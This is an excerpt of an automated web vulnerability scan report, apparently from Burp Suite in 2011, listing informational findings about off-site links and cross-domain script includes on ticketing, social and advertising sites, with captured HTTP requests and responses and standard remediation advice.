<a href="/concert-tickets/" title="concert tickets"><img src="http://cache1.stubhubstatic.com/promotions/scratch/lt/concerts_tabbl.gif" width="84" height="31" border="0"></a>
...[SNIP]...
<a href="/theater-tickets/" title="theater tickets"><img src="http://cache1.stubhubstatic.com/promotions/scratch/lt/theater_tab.gif" width="80" height="31" border="0"></a>
...[SNIP]...
<div id="lfthand"><img border="0" align="right" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/hand_left.gif" width="6" height="9"></div>
...[SNIP]...
</script><script language="JavaScript" src="http://cache1.stubhubstatic.com/promotions/scratch/test/s_code_common.js"></script>
...[SNIP]...
rorsMsg" style="border: medium none ; margin: 0pt; clear: none; font: normal 12px arial; color:#222222;">
To use all the features of this page, you'll need to install Adobe flash Player. It's free!
[..<a href="http://www.adobe.com/go/getflashplayer" target="_blank" title="DownloadFlash">Get Flash Player</a>
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab" height="210px" id="TDMap" width="200px"><param name="movie" value="http://cache3.stubhubstatic.com/resources/flex/TDMap-1.02.swf"/>
...[SNIP]...
ctionid=221945&staticMap=http://cache1.stubhubstatic.com/data/venue_maps/174027/stubhub_450926_NewMeadowlandsStadium_U2.png&mapVersion=2.0&staticDomainUrl=http://cache3.stubhubstatic.com"/><embed align="middle" allowScriptAccess="sameDomain" bgcolor="#869ca7" flashvars="&venueid=450926&sectionid=221945&staticMap=http://cache1.stubhubstatic.com/data/venue_maps/174027/stubhub_450926_NewMeadowlandsStadium_U2.png&mapVersion=2.0&staticDomainUrl=http://cache3.stubhubstatic.com" height="210px" id="TDMap" loop="false" name="TDMap" play="true" pluginspage="http://www.adobe.com/go/getflashplayer" quality="high" src="http://cache3.stubhubstatic.com/resources/flex/TDMap-1.02.swf" type="application/x-shockwave-flash" width="200px" wmode="opaque"/></object>
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab" height="210px" id="TDMap" width="200px"><param name="movie" value="http://cache3.stubhubstatic.com/resources/flex/TDMap-1.02.swf"/>
...[SNIP]...
ctionid=221945&staticMap=http://cache1.stubhubstatic.com/data/venue_maps/174027/stubhub_450926_NewMeadowlandsStadium_U2.png&mapVersion=2.0&staticDomainUrl=http://cache3.stubhubstatic.com"/><embed align="middle" allowScriptAccess="sameDomain" bgcolor="#869ca7" flashvars="&venueid=450926&sectionid=221945&staticMap=http://cache1.stubhubstatic.com/data/venue_maps/174027/stubhub_450926_NewMeadowlandsStadium_U2.png&mapVersion=2.0&staticDomainUrl=http://cache3.stubhubstatic.com" height="210px" id="TDMap" loop="false" name="TDMap" play="true" pluginspage="http://www.adobe.com/go/getflashplayer" quality="high" src="http://cache3.stubhubstatic.com/resources/flex/TDMap-1.02.swf" type="application/x-shockwave-flash" width="200px" wmode="opaque"/></object>
...[SNIP]...
</div><script src="http://cache1.stubhubstatic.com/resources/mojito/js/lib/jquery.bundle.201105231737.min.js" type="text/javascript"></script><script src="http://cache1.stubhubstatic.com/resources/mojito/js/common/stubhub-1.2.js" type="text/javascript"></script><script src="http://cache1.stubhubstatic.com/resources/mojito/js/pattern/phoenix-RC.js" type="text/javascript"></script>
...[SNIP]...
</script><script language="javascript" src="http://cache1.stubhubstatic.com/resources/mojito/js/feature/ticket-1.0.js" type="text/javascript"></script>
...[SNIP]...
<a href="/privacy_policy" title="TRUSTe" target="_blank"><img src="http://cache1.stubhubstatic.com/promotions/scratch/sh/truste_logo_vert.gif" width="40" height="56" style="float:right;padding-right:50px;padding-top:30px;" border="0"></a>
...[SNIP]...
</script><script type="text/javascript" src="http://cache1.stubhubstatic.com/resources/js/third_party/jquery.autocomplete.js"></script>
...[SNIP]...
</div><script src="http://cache1.stubhubstatic.com/promotions/scratch/lt/bubble.min-1.0.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/geo_ui_v8.2.min.js"></script>
...[SNIP]...
</script><script language="javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/content-1.1.min.js" type="text/javascript"></script>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/sf1stu_UniversalAllPages_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
</script><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/baynote/baynote.js"></script>
...[SNIP]...

20.92. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The page was loaded from a URL containing a query string:

http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1
http://cdn.stumble-upon.com/css/global_su.css?v=20110718-01
http://cdn.stumble-upon.com/favicon.ico
http://cdn.stumble-upon.com/i/assets/homePromo1.jpg
http://cdn.stumble-upon.com/images/close-button.png
http://cdn.stumble-upon.com/images/s.gif
http://cdn.stumble-upon.com/js/attach_su.js?v=20110718-01
http://cdn.stumble-upon.com/js/plugins_su.js?v=20110718-01

Request

GET /submit?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da; cmf_i=309046094e1443cb1cc136.64488011; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 48644
Date: Tue, 19 Jul 2011 14:28:25 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta name="description" content="Submit a site to StumbleUpon" />

   <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/global_su.css?v=20110718-01" type="text/css" media="screen, projection" />
   


           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110718-01"></script>

   <link rel="shortcut icon" href="http://cdn.stumble-upon.com/favicon.ico" />


           <title>
...[SNIP]...
<noscript>
                   <img src="http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1" />
               </noscript>
...[SNIP]...
<div id="ff-install-helper" style="display: none;">
               <img id="close-button" src="http://cdn.stumble-upon.com/images/close-button.png" alt="x" />
               <h2>Installing is Easy!<img src="http://cdn.stumble-upon.com/images/s.gif" class="iconArrow24" /></h2>
...[SNIP]...
<div style="padding: 35px 0 200px 320px;" class="clearfix">
                   <img src="http://cdn.stumble-upon.com/i/assets/homePromo1.jpg" height="140" width="278" alt="Discover the best videos from YouTube" class="left" style="margin-left: -300px;"/>
                   <h2 style="padding-top: 15px; margin-bottom: 25px; font-size: 20px;">
...[SNIP]...


   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110718-01"></script>
...[SNIP]...

20.93. http://www.techexcel.com/products/devsuite/devteststudio.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.techexcel.com
Path:	/products/devsuite/devteststudio.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.techexcel.com/products/devsuite/devteststudio.html?gclid=CLL574jNjaoCFchM4AodNRT1yQ

The response contains the following links to other domains:

http://www.twitter.com/techexcel
https://apis.google.com/js/plusone.js

Request

GET /products/devsuite/devteststudio.html?gclid=CLL574jNjaoCFchM4AodNRT1yQ HTTP/1.1
Host: www.techexcel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 35123
Content-Type: text/html
Last-Modified: Mon, 11 Jul 2011 09:00:56 GMT
Accept-Ranges: bytes
ETag: "ac7fbcba93fcc1:a7ae"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:29 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script><script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</a>| <a href="http://www.twitter.com/techexcel"><img src="/images/twitter.gif" alt="follow us at twitter" width="14" height="14" />
...[SNIP]...

20.94. http://www.ticketmaster.com/event/000043582C516D43 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketmaster.com
Path:	/event/000043582C516D43

Issue detail

The page was loaded from a URL containing a query string:

http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1

The response contains the following links to other domains:

http://creatives.as4x.tmcs.net/tmsandbox3a.html?site=tm&adsize=176x200&handle=N&pagepos=580&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43
http://facebook.com/Ticketmaster
http://twitter.com/ticketmaster
http://www.floraflora.com/
http://www.gifts.com/
http://www.houseofblues.com/
http://www.hsn.com/
http://www.limos.com/
http://www.livenation.com/
http://www.nba.com/tickets/tickets.html
http://www.newmeadowlandsstadium.com/
http://www.nfl.com/tickets
http://www.nhl.com/ice/tickets.htm
http://www.priceline.com/default.asp?refid=PLTICKETMASTER&refclickid=FT_HOMEPAGE
http://www.pronto.com/
http://www.shoebuy.com/
http://www.slotix.com/
http://www.ticketmaster.ca/
http://www.ticketmaster.es/
http://www.ticketmaster.ie/
http://www.ticketweb.com/

Request

GET /event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1 HTTP/1.1
Host: www.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa PSAa CONo HISa TELo OURDELo UNRo IND PHY ONL UNI PUR COM NAV INT DEM"
Content-Type: text/html; charset=utf-8
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 154498
Date: Tue, 19 Jul 2011 18:36:25 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: ORIGIN=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970
Set-Cookie: BRAND=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo
...[SNIP]...
<br>For venue information, please visit <A HREF="http://www.newmeadowlandsstadium.com" target="_new">www.newmeadowlandsstadium.com</A>
...[SNIP]...
<div class="neutral-block-empty">

<iframe width=536 height=200 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=#000000 allowtransparency="true" src="http://creatives.as4x.tmcs.net/tmsandbox3a.html?site=tm&adsize=176x200&handle=N&pagepos=580&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43" style="overflow:hidden"></iframe>
...[SNIP]...
</h2>
<a href="http://www.livenation.com/" target="_blank">Live Nation</a>
<a href="http://www.houseofblues.com/" target="_blank">House of Blues</a> <a href="http://www.ticketweb.com/" target="_blank">TicketWeb</a>
...[SNIP]...
</span><a href="http://www.ticketmaster.ca/" target="_blank">Canada</a>
...[SNIP]...
</a> <a href="http://www.ticketmaster.ie/" target="_blank">Ireland</a> <a href="http://www.ticketmaster.es/" target="_blank">Spain</a>
...[SNIP]...
</a>
<a href="http://www.limos.com" target="_blank" rel="nofollow">Limos.com</a>
<a href="http://www.nba.com/tickets/tickets.html" target="_blank" rel="nofollow">NBA</a>
<a href="http://www.nfl.com/tickets" target="_blank" rel="nofollow">NFL</a>
<a href="http://www.nhl.com/ice/tickets.htm" target="_blank" rel="nofollow">NHL</a>
<a href="http://www.priceline.com/default.asp?refid=PLTICKETMASTER&refclickid=FT_HOMEPAGE" target="_blank" rel="nofollow">Priceline</a>
<a href="http://www.slotix.com/" class="space" target="_blank">SLO VIP Services</a>
...[SNIP]...
</span>
<a href="http://facebook.com/Ticketmaster" id="facebookIcon" target="_blank" rel="nofollow"><img src="http://media.ticketmaster.com/tm/en-us/img/sys/1000/logoFB.png" alt="Follow us on Facebook" /></a>
<a href="http://twitter.com/ticketmaster" id="twitterIcon" target="_blank" rel="nofollow"><img src="http://media.ticketmaster.com/tm/en-us/img/sys/1000/logoTwit.png" alt="Follow us on Twitter" />
...[SNIP]...
<br />OTHER PARTNERS:  <a href="http://www.floraflora.com/" target="_blank">Floraflora</a>
<a href="http://www.gifts.com/" target="_blank">Gifts</a>
<a href="http://www.hsn.com/" target="_blank">Online Shopping</a>
<a href="http://www.pronto.com/" target="_blank">Pronto</a>
<a href="http://www.shoebuy.com/" class="space" target="_blank">Shoebuy</a>
...[SNIP]...

21. Cross-domain script include previous next
There are 93 instances of this issue:

http://a.netmng.com/hic/
http://a.tribalfusion.com/j.ad
http://a.tribalfusion.com/j.ad
http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127
http://bcp.crwdcntrl.net/px
http://bing.fansnap.com/checkout/index/415814268
http://bing.fansnap.com/checkout/index/418563179
http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669
http://cc.bingj.com/cache.aspx
http://developers.facebook.com/
http://digg.com/submit
http://feeds.feedburner.com/netsparker
http://googleads.g.doubleclick.net/pagead/ads
http://investor.realnetworks.com/stockquote.cfm
http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js
http://majornelson.com/
http://mobile.ebay.com/
http://mobile.ebay.com/mobileweb/ebay
http://mobileweb.ebay.com/
http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue
http://realnetworks.com/
http://realnetworks.com/about-us/affiliate.aspx
http://realnetworks.com/contact-us.aspx
http://realnetworks.com/contact-us/realnetworks-united-states-offices.aspx
http://realnetworks.com/pressroom/index.aspx
http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5
http://sharethis.com/account/signin-widget
https://signin.ebay.com/ws/eBayISAPI.dll
http://support.gamehouse.com/
http://support.gamehouse.com/app/answers/detail/a_id/861/
http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D
http://support.gamehouse.com/app/contact
http://support.microsoft.com/contactus/
http://umfcluj.ro/
http://umfcluj.ro/Detaliu.aspx
http://umfcluj.ro/contact.aspx
http://umfcluj.ro/en
http://umfcluj.ro/fr
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/search.aspx
http://umfcluj.ro/sitemap.aspx
http://www.adminitrack.com/
http://www.atlassian.com/en/resources/wac/js/globalNav.js
http://www.atlassian.com/software/jira/pricing.jsp
http://www.axosoft.com/
http://www.axosoft.com/lp/ga/bug-tracking-software/
http://www.axosoft.com/ontime
http://www.axosoft.com/ontime/bug_tracking
http://www.bnymellonam.com/core/hub/am_site_selector.html
http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html
http://www.discoverbing.com/
http://www.facebook.com/advertising/
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/badges/
http://www.facebook.com/careers/
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/find-friends
http://www.facebook.com/help/
http://www.facebook.com/mobile/
http://www.facebook.com/pages/create.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/r.php
http://www.facebook.com/terms.php
http://www.factset.com/
http://www.factset.com/events
http://www.factset.com/images/searchInputBg.gif
http://www.factset.com/products/im
http://www.factset.com/products/im/img/im/title_1_2.png
http://www.factset.com/products/privateequity
http://www.fansnap.com/
http://www.fansnap.com/developers
http://www.fastteks.com/TechSolutions/News.aspx
http://www.gamestop.com/
http://www.googlelabs.com/
http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx
http://www.intelex.com/landing/~/script/highslide/highslide.css
http://www.livedrive.com/
http://www.livedrive.com/ForHome/ProSuite
http://www.livedrive.com/SignupToLivedrive
http://www.mavitunasecurity.com/
http://www.mavitunasecurity.com/blog/
http://www.myspace.com/auth/loginform
http://www.nne.aaa.com/en-nne/Pages/Home.aspx
http://www.numarasoftware.com/welcome/service_desk.aspx
http://www.seapine.com/ttpro.html
http://www.stubhub.com/
http://www.stumbleupon.com/submit
http://www.techexcel.com/products/devsuite/devteststudio.html
http://www.versionone.com/Product/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

21.1. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest= HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

21.2. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The response dynamically includes the following script from another domain:

http://tag.admeld.com/passback/js/610/bostonglobe/300x250/12/meld.js

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=a2nXSoP3rTwoiAyWrVjrMprETAW3VoE9iJ3ZaC9NKjcuSYjAwNoUderTsfhtT7CvHqlhNolZbO3wZb6Pj4CR6BnIoBDy2sqRgXaUv3as0WA1QsjE1GEf9Py6TCc5J5uvjINffJUb8VpXxo3EC0OnVPlJlIZdj8Wbw3Zd8QPACFYZb9BiSfcRlyHZaZcfatO3p6twFN4WI9yhVTroynMZdnfurN7oBm8cZd5aZbBaLZdkK2drax8oHt1ZccxUs8DiE065deiBlyn13J5RFVXrwTHxWFecJ; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:44:26 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1147
Expires: 0
Connection: keep-alive

document.write('<script src="http://tag.admeld.com/passback/js/610/bostonglobe/300x250/12/meld.js"><\/script>');
document.write('<script type="text/javascript">\r\nvar TFPix1725274878 = [\r\n
...[SNIP]...

21.3. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The response dynamically includes the following script from another domain:

http://tag.admeld.com/passback/js/610/bostonglobe/728x90/12/meld.js

Request

Response

21.4. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B5146585.127

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

21.5. http://bcp.crwdcntrl.net/px previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/px

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/seg?add=153795&t=1

Request

Response

21.6. http://bing.fansnap.com/checkout/index/415814268 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
